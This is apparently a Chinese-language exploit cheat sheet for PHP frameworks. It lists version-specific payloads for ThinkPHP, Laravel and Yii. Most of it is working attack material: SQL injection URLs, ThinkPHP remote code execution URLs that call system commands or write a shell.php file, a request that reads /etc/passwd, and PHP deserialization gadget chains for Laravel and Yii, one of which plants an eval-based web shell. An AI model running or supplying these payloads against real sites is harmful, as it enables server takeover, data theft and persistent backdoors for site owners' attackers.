CMS

Exploit Database: https://www.exploit-db.com/


对比源码:diff -r DirA DirB

ThinkPHP

  • 版本

    关键字:THINK_VERSION

  • 3.2.x

    日志:<domain>/Application/Runtime/Logs/Home/21_04_27.log

    • 通用

    • 3.2.3

      • SQL报错注入

        http://server/index.php?m=Home&c=Index&a=index2&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1) %23

        http://server/index.php?username[0]=exp&username[1]==1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1) %23

        http://server/index.php?id[0]=bind&id[1]=0 and updatexml(1,concat(0x7e,user(),0x7e),1)&password=1

      • 变量覆盖

        empty($_content)?include $templateFile:eval('?>'.$_content);

  • 5.0.x

    • 5.0.7<=ver<=5.0.22

      • 未开启强制路由RCE

        ?s=index/think\config/get&name=database.username

        ?s=index/\think\Lang/load&file=../../test.jpg

        ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

    • <5.0.23

      ThinkPHP 5.0.0~5.0.23 Request类任意方法调用导致RCE漏洞分析

      • RCE

        http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

        http://server/index.php?s=captcha POST: _method=__construct&filter[]=system&method=GET&get[]=whoami

        http://server/index.php?s=index/index POST: _method=__construct&filter[]=system&method=GET&get[]=whoami

      • 任意文件包含

        http://server/index.php?s=captcha POST: _method=__construct&method=GET&filter[]=think\__include_file&server[]=1&get[]=/etc/passwd

    • <5.0.12

      • RCE

        http://server/index.php?s=index/index POST: _method=__construct&filter[]=system&method=POST&s=whoami

    • 5.0.21-5.0.23

      • RCE

        http://server/index.php?s=captcha POST: _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

    • 5.0.24

  • 5.1.x

    • 通用

      • 未开启强制路由RCE

        ?s=index/\think\Request/input&filter[]=system&data=pwd

        ?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>

        ?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>

        ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

        ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

    • 5.1.31

      • RCE

        http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

Laravel

  • 版本

    vendor/laravel/framework/src/Illuminate/Foundation/Application.php

  • 5.7.x

    • 5.7.29

      • 反序列化+RCE

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        42
        43
        44
        45
        46
        47
        48
        49
        50
        51
        52
        53
        54
        55
        56
        57
        58
        //不用PendingCommand.php
        <?php
        namespace Symfony\Component\Routing\Loader\Configurator {
        class ImportConfigurator
        {
        private $parent;
        public function __construct($parent)
        {
        $this->parent = $parent;
        }
        }
        }

        namespace Faker {
        class DefaultGenerator{
        protected $default;
        public function __construct($default)
        {
        $this->default = $default;
        }
        public function __call($method, $attributes)
        {
        return $this->default;
        }
        }
        class ValidGenerator
        {
        protected $generator;
        protected $validator;
        protected $maxRetries;
        public function __construct($validator,$generator)
        {
        $this->generator = new DefaultGenerator($generator);
        $this->validator = $validator;
        $this->maxRetries = 1;
        }

        public function __call($name, $arguments)
        {
        $i = 0;
        do {
        $res = call_user_func_array(array($this->generator, $name), $arguments);
        $i++;
        if ($i > $this->maxRetries) {
        throw new \OverflowException(sprintf('Maximum retries of %d reached without finding a valid value', $this->maxRetries));
        }
        } while (!call_user_func($this->validator, $res));

        return $res;
        }
        }
        }

        namespace {
        $a = new Faker\ValidGenerator("system","cat /flag");
        $b = new Symfony\Component\Routing\Loader\Configurator\ImportConfigurator($a);
        echo urlencode(serialize($b));
        }
  • 8.1

Yii

  • 版本

    a. 在controllers目录新建TestController.php控制器,打开TestController.php文件输入<?php echo Yii::getVersion(); ?>,访问Yii项目中的test控制器下的indexindex.php?r=test

    b. /vendor/yiisoft/yii2/BaseYii.php

  • 2.0.x

    • <2.0.37

      • 反序列化

        a. yii\db\BatchQueryResult::__destruct() -> Faker\Generator::__call() -> yii\rest\IndexAction::run()

        b. yii\db\BatchQueryResult::__destruct() -> Faker\Generator::__call() -> yii\rest\CreateAction::run()

        c.

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        <?php
        namespace yii\rest{
        class IndexAction{
        public $checkAccess;
        public $id;
        public function __construct(){
        $this->checkAccess = 'assert';
        $this->id = 'file_put_contents("1.php","<?php eval(\$_POST[0]);?>");exit();';
        }
        }
        }
        namespace yii\db{
        use yii\web\DbSession;
        class BatchQueryResult
        {
        private $_dataReader;
        public function __construct(){
        $this->_dataReader=new DbSession();
        }
        }
        }
        namespace yii\web{
        use yii\rest\IndexAction;
        class DbSession
        {
        public $writeCallback;
        public function __construct(){
        $a=new IndexAction();
        $this->writeCallback=[$a,'run'];
        }
        }
        }
        namespace{
        use yii\db\BatchQueryResult;
        echo base64_encode(serialize(new BatchQueryResult()));
        }
  • 2.0.38

    • 反序列化

      a. Codeception\Extension\RunProcess::__destruct() -> Faker\Generator::__call() -> yii\rest\IndexAction::run()

      b. Swift_KeyCache_DiskKeyCache -> phpDocumentor\Reflection\DocBlock\Tags\See::__toString()-> Faker\Generator::__call() -> yii\rest\IndexAction::run()

Joomla!